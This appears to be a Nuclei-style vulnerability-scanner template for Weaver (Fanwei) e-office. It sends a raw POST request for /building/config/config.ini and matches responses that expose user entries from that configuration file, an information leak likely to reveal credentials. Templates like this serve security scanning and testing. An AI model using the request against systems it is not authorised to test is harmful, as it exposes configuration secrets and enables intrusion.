id: fanwei-e-office-config-infolead

info:
  name: fanwei-e-office-config-infolead
  author: fanwei-e-office-config-infolead

http:
  - raw:
      - |
        POST /building/config/config.ini HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1499.61 Safari/537.36
        Content-Length: 0
        Accept: */*
        Accept-Encoding: gzip, deflate



    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"user","[building]")